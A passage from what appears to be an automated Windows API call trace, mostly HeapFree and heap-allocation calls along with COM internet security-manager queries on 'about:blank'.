[0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f398 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629400 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f3b0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f3c8 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bc18 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644b28 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b940 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bbc0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] IUnknown:Release (This=0x63c68c) returned 0x4 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d788 | out: hHeap=0x610000) returned 1 [0077.090] IUnknown:Release (This=0x63c68c) returned 0x3 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fef8 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624170 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650030 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fe88 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f308 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63cef0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fcd8 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6510c8 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650ac0 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651598 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651438 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650c40 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d830 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67b768 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ebb8 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67b670 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6515f0 | out: hHeap=0x610000) returned 1 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682c88 | out: hHeap=0x610000) returned 1 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6833a0 | out: hHeap=0x610000) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x63b940 [0077.093] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651438 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651438 | out: hHeap=0x610000) returned 1 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.093] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x64292c, dwReserved=0x0 | out: ppSM=0x64292c*=0x65d270) returned 0x0 [0077.093] IInternetSecurityManager:SetSecuritySite (This=0x65d270, pSite=0x642934) returned 0x0 [0077.093] IUnknown:AddRef (This=0x642934) returned 0x31 [0077.093] IUnknown:QueryInterface (in: This=0x642934, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f514 | out: ppvObject=0x18f514*=0x642938) returned 0x0 [0077.093] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x65d298 | out: ppvObject=0x65d298*=0x0) returned 0x80004002 [0077.094] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x65d294 | out: ppvObject=0x65d294*=0x0) returned 0x80004002 [0077.094] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x65d290 | out: ppvObject=0x65d290*=0x750296bc) returned 0x0 [0077.094] IUnknown:Release (This=0x642938) returned 0x0 [0077.094] IUnknown:AddRef (This=0x63baa4) returned 0x4 [0077.094] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="about:blank", pdwZone=0x18f54c, dwFlags=0x0 | out: pdwZone=0x18f54c*=0xffffffff) returned 0x800c0011 [0077.094] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.094] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.094] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0077.094] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x18f550, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x18f550*=0x0) returned 0x0 [0077.094] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f290 | out: hHeap=0x610000) returned 1 [0077.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.095] IUnknown:Release (This=0x620638) returned 0x1 [0077.095] IUnknown:Release (This=0x63baa4) returned 0x2 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644cb8 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x659f60 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x648818 | out: hHeap=0x610000) returned 1 [0077.095] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x6876d0 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6876d0 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x687660 | out: hHeap=0x610000) returned 1 [0077.095] LsDestroyContext () returned 0x0 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6650a0 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650a90 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68d2f8 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682b98 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63a868 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685968 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x679bc8 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65eb70 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6859e0 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685a30 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685918 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685a80 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67d058 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cb18 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca58 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca48 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca68 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68d5e8 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650270 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68dc30 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650398 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6651b8 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67b850 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6504d0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622e00 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66bec0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a798 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x686fb8 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652528 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652338 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650668 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a4f0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651018 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652240 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651fc0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a688 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x677338 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6875f0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6940c0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x694000 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x694180 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a188 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a0c0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68d9d8 | out: hHeap=0x610000) returned 1 [0077.098] IUnknown:Release (This=0x65d270) returned 0x0 [0077.098] IUnknown:Release (This=0x642934) returned 0x0 [0077.098] IUnknown:Release (This=0x750296bc) returned 0x7fff [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d980 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f3e0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, 